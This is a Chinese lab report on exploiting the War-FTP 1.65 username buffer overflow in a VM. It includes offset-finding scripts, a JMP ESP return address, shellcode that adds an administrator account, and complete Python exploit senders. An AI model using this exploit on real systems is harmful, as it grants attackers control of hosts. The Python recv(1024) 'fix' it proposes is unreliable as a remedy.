一、实验目的
通过实践掌握缓冲区溢出的原理;掌握常用的缓冲区溢出方法;理解缓冲区溢出危害性;掌握防范和避免缓冲区溢出攻击的措施。
二、实验准备
所需工具:VM虚拟机,存在漏洞的windows版本镜像,ccproxy,war-ftp,cdb/windbg等调试工具,python3,详见网络攻防:ccproxy + war-ftpd 缓冲区溢出攻击详解
(1)理解缓冲区溢出攻击的原理。
(2)获取 War-ftp 1.65,学习使用该软件。
(3)了解 War-ftp1.65 漏洞细节:发送长度超过 480 字节的用户名给 War-ftp 服务器可 以触发漏洞(即 USER longString\r\n) ,溢出之后 ESP 指令寄存器的内容包含了 longString 中的部分内容。远程攻击者可利用此漏洞以应用程序进程权限执行任意指令。
(4)熟悉 www.metasploit.com 中生成 shellcode 的方法。
(5)安装perl,学习使用光盘中的patternCreate.pl和patternOffset.pl,其中patternCreate.pl 用于创建不重复的字符串,patternOffset.pl 用于定位字符串。
(6)学习使用一种调试工具,因为要查看溢出后缓冲区里的情况和各寄存器的信息, 需要用到调试工具。比较专业的调试工具有 OllyDBG、IDA Pro 等,比较简单易用的调试工具有 NTSD、CDB 和 WinDbg(这三个工具都包含在 Debugging Tools for Windows 中,其中 Windows 2000 以上的系统自带有 NTSD)。在此实验中推荐使用 CDB 或者 NTSD,两者的 使用方法基本一致。
(7)学习参考书目中对 CCProxy6.2 Ping Overflow 漏洞的分析与利用,在理解实例的基础上完成此实验。
三、实验内容
利用War-ftp 1.65 Buffer Overflow 漏洞,在目标主机上添加一个用户。按照如下步骤进行:
(1)检测漏洞的存在。
(2)构造能够实现在目标主机上添加用户的 Shellcode。
(3)获取缓冲区的大小并定位溢出点 Ret 的位置。
(4)改变程序的流程使 War-ftp 在溢出之后执行 Shellcode。
(5)选择一种编程语言实现漏洞利用程序。
四、意外情况
1. 无法通过OllyDBG运行war-ftp
运行前需要保证:
- 关闭war-ftp进程
- 删除war-ftp同文件夹下的Ftp-Daemon.dat文件
- 在OllyDBG中点击Debug->restart
2. 装载运行后出现exception,war-ftp无响应
多次点击运行按钮,war-ftp会响应,点击Go Online即可开启服务。实在不行使用windbg代替ollyDBG,如网络攻防:ccproxy + war-ftpd 缓冲区溢出攻击详解所示
五、详细步骤
1. 使用OllyDBG运行war-ftp并Go-online
点击go-online后,在war-ftp同文件夹下会出现Ftp-Daemon.dat文件,删除即可
2. 测试缓冲区溢出漏洞
打开ftp并输入对应的ip,请求连接。war-ftp进入1 connection状态
我们生成一串比较长的用户名(下面记为outstr)测试,在此使用了encodestr.py生成长度为2000的不重复字符串,不重复的好处在于之后分析堆栈时,可以很方便的通过寄存器内容找到outstr对应的位置。
密码随意输入。发现war-ftp出现异常,进入无响应状态:
a="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b="abcdefghijklmnopqrstuvwxyz"
c="0123456789"
def getstr(num):
outstr=""
for i in range(0,26):
for j in range(0,26):
for k in range(0,10):
outstr += a[i]+b[j]+c[k]
if(len(outstr) > num):
return outstr
outstr = getstr(2000)
with open("str.txt","w") as f:
f.write(outstr[:num]) #这句话自带文件关闭功能,不需要再写f.close()
或
from string import ascii_uppercase, ascii_lowercase, digits
import itertools
# 1.确定跳转位置 生成不重复的1000字符串
pattern = (''.join(map(''.join, itertools.product(ascii_uppercase, ascii_lowercase, digits))).encode())[:2000]
3. 分析堆栈的内容
eip: 32714131 为指针寄存器(按字节分开,对应字符串为1Aq2),位置为485
esp: q4Aq 可直接在outstr寻找对应的位置,为493,指向栈顶
ebp: 3At4 可直接在outstr寻找对应的位置,为581,指向栈基(栈的结构是从高到低的)
使用location.py脚本找出字符串在outstr中对应的位置:
str = '32714131'
ostr = ''
for i in range(len(str), 0, -2):
tmp = int(str[i - 2:i], 16)
ostr += chr(tmp)
print(ostr)
print(outstr.find(ostr))
print(outstr.find('q4Aq'))
print(outstr.find('3At4'))
或
pattern.find(bytes.fromhex('32714131')[::-1])
由此,我们可以绘制栈结构对应的字符串位置:
如图所示,war-ftp原本的结构中缓冲区大小被固定为480个字符以内,如果输入的字符串长度过长会覆盖原本在485的JUMP指令以及493的shellcode,使程序进入异常。
若使用精心构造的序列攻击,发生缓冲溢出,CPU根据EIP的地址跳转到堆栈第493字节开始的ESP执行shellcode。
4. 构造exploit结构
这里的重点之一是寻找组成注入向量的跳转地址(JMP ESP的指令地址),可以使用中文WIN 2K/XP/2003下通用的JMP ESP:0x7ffa4512,对应esp地址用\x12\x45\xfa\x7f来填充(这是因为x86系统是little-endian方式),这里还可以使用python脚本生成颠倒的字符串。
retaddr = bytes.fromhex('7ffa4512')[::-1]
重点之二是构造攻击代码:为了防止在执行shellcode之前程序乱跳,所以使用NOP(\x90)指令来进行预防(从user 后接485个NOP指令),从493字节把shellcode复制过去,最后以\r\n\0表示ftp user命令结束。
buf = (b"\x90" *485 + retaddr).ljust(493,b"\x90") + shellcode + b"\r\n\0"
这里的ljust()方法返回一个原字符串左对齐,并使用空格填充至指定长度的新字符串。如果指定的长度小于原字符串的长度则返回原字符串。
5. shellcode构造
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。
shellcode可以使用msfpayload生成,以下是2个生成示例:
class Shellcode:
# 在window xp下建立一个zane的用户,并设置为管理员
code1 = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x51\x5a\x6a\x4a"
"\x58\x30\x42\x30\x50\x41\x6b\x41\x41\x5a\x42\x32\x41\x42\x32\x42"
"\x41\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x7a\x49\x79\x6c\x69"
"\x78\x51\x54\x57\x70\x43\x30\x63\x30\x4c\x4b\x67\x35\x45\x6c\x6e"
"\x6b\x71\x6c\x66\x65\x43\x48\x55\x51\x5a\x4f\x4e\x6b\x70\x4f\x42"
"\x38\x4c\x4b\x43\x6f\x51\x30\x56\x61\x78\x6b\x30\x49\x4c\x4b\x76"
"\x54\x4c\x4b\x65\x51\x7a\x4e\x66\x51\x6b\x70\x5a\x39\x6e\x4c\x4d"
"\x54\x4f\x30\x73\x44\x56\x67\x68\x41\x5a\x6a\x66\x6d\x44\x41\x6a"
"\x62\x58\x6b\x48\x74\x65\x6b\x72\x74\x31\x34\x77\x74\x74\x35\x79"
"\x75\x6c\x4b\x73\x6f\x67\x54\x64\x41\x7a\x4b\x62\x46\x6e\x6b\x64"
"\x4c\x30\x4b\x6e\x6b\x33\x6f\x75\x4c\x37\x71\x48\x6b\x6e\x6b\x57"
"\x6c\x4c\x4b\x77\x71\x58\x6b\x4c\x49\x61\x4c\x56\x44\x47\x74\x69"
"\x53\x70\x31\x4b\x70\x45\x34\x4c\x4b\x31\x50\x64\x70\x6f\x75\x49"
"\x50\x52\x58\x36\x6c\x4c\x4b\x43\x70\x64\x4c\x4e\x6b\x74\x30\x45"
"\x4c\x4c\x6d\x4e\x6b\x63\x58\x33\x38\x6a\x4b\x47\x79\x4c\x4b\x4d"
"\x50\x68\x30\x37\x70\x73\x30\x53\x30\x6e\x6b\x35\x38\x55\x6c\x53"
"\x6f\x47\x41\x6a\x56\x73\x50\x52\x76\x4b\x39\x7a\x58\x4f\x73\x6b"
"\x70\x63\x4b\x76\x30\x42\x48\x31\x6e\x78\x58\x78\x62\x62\x53\x62"
"\x48\x7a\x38\x4b\x4e\x4f\x7a\x66\x6e\x30\x57\x69\x6f\x38\x67\x61"
"\x73\x50\x6d\x55\x34\x66\x4e\x33\x55\x73\x48\x35\x35\x61\x30\x54"
"\x6f\x45\x33\x31\x30\x50\x6e\x72\x45\x50\x74\x65\x70\x30\x75\x41"
"\x63\x70\x65\x73\x42\x37\x50\x51\x6a\x62\x41\x62\x4e\x72\x45\x71"
"\x30\x71\x75\x70\x6e\x50\x61\x72\x5a\x37\x50\x46\x4f\x43\x71\x71"
"\x54\x43\x74\x41\x30\x36\x46\x51\x36\x55\x70\x70\x6e\x43\x55\x70"
"\x74\x55\x70\x30\x6c\x72\x4f\x32\x43\x35\x31\x50\x6c\x70\x67\x64"
"\x32\x72\x4f\x54\x35\x42\x50\x35\x70\x32\x61\x71\x74\x42\x4d\x62"
"\x49\x30\x6e\x55\x39\x33\x43\x73\x44\x71\x62\x51\x71\x72\x54\x50"
"\x6f\x54\x32\x31\x63\x45\x70\x71\x6a\x42\x41\x62\x4e\x41\x75\x55"
"\x70\x46\x4f\x30\x41\x30\x44\x30\x44\x43\x30\x4a")
# 执行winexec的shellcode代码如下,其中0x751f3231是WinExec的地址
buf = ""
buf += "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45"
buf += "\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6"
buf += "\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78"
buf += "\xC6\x45\xFE\x65\x6A\x01\x8D\x45\xF8\x50\xBA"
buf += "\xad\x23\x86\x7c"
buf += "\xFF\xD2\xC9"
6. 使用ftplib打开命令行
链接war-ftp的方式可以用socket,也可以直接使用封装好的ftplib库,发送字符串。这里由于\x90不能解码,直接替换成没有含义的A或B.
from ftplib import FTP
from shellcode import Shellcode
ftp = FTP('192.168.5.132')
buf = 'A' * 485 + '\x12\x45\xfa\x7f' + 'B' * 4 #多增加4个B
buf += Shellcode.buf
ftp.login(buf, 'ww')
成功打开命令行窗口:
7. 使用socket创建管理员
另外一种方式是使用socket直接connect对应的ip和端口,发送二进制串。
import socket
from shellcode import Shellcode
def send_buf(buffer, host='192.168.5.132', port=21):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((host, port))
data = b'user ' + buffer + b"\r\n\0"
sock.send(data)
sock.recv(1000)
retaddr = bytes.fromhex('7ffa4512')[::-1]
buf = (b"\x90" * 485 + retaddr).ljust(493, b"\x90") + Shellcode.code1.encode('utf-8')
send_buf(buf)
在控制面板或登录界面下,成功创建了管理员用户zane:
七、解决方案
对于缓冲区溢出问题,根本原因是服务器在搭建ftp服务器端时,未对用户输入长度进行限制。服务器端对于用户发来的请求没有进行处理而直接覆盖了缓冲区后面的代码。
解决方案也很简单,以python代码为例:
#进行用户名密码验证的函数
def name_check(self):
while True:
name = self.request.recv(1024).decode('utf-8')
self.request.send('0'.encode('utf-8'))
passwd=self.request.recv(1024).decode('utf-8')
if common.login(name,passwd):
self.request.send('0'.encode('utf-8'))
return name
else:
self.request.send('1'.encode('utf-8'))
continue
使用request.recv是带上参数1024,表示接受命令的长度最大是1024,这样就可以避免缓冲区溢出攻击。
八、总结原理与防范思路
通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其它指令,以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。缓冲区溢出攻击占了远程网络攻击的绝大多数,这种攻击可以使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权。如果能有效地消除缓冲区溢出的漏洞,则很大一部分的安全威胁可以得到缓解。
有以下几种基本的方法保护缓冲区免受缓冲区溢出的攻击和影响:
- 通过操作系统限制可执行代码的区域,使得缓冲区不可执行,从而阻止攻击者植入攻击代码
- 强制写正确的代码的方法:对于C语言中不安全的函数我们要使用安全的函数来替代,用fgets()、strncpy()、strncat()来替代gets()、strcpy()、strcat()等不限制字符串长度,不检查数组越界的函数。实际上编译器在编译完代码之后就已经提示了一个警告
warning, this program uses gets(), which is unsafe.。所以,我们应该重视编译器给我们的提示,这样往往能避免常见的错误 - 利用编译器的边界检查来实现缓冲区的保护,使得缓冲区溢出不可能出现,从而完全消除了缓冲区溢出的威胁
- 在向一块内存中写入数据之前要确认这块内存是否可以写入,同时检查写入的数据是否超过这块内存的大小
- 栈破坏检测。也就是说在实际的缓冲区上面做个标记,保存这个标记,然后在函数返回之前检查这个标记,如果这个标记和函数调用之前不一样了,就说明在函数调用的过程中发生了溢出,这是就抛异常,让程序异常终止。
- 栈随机化法。也就是说让栈的位置在程序每次运行时都不一样,然后黑客将可执行代码插入内存之后就不容易找到指向该字符串的地址,也就不能执行插入的程序了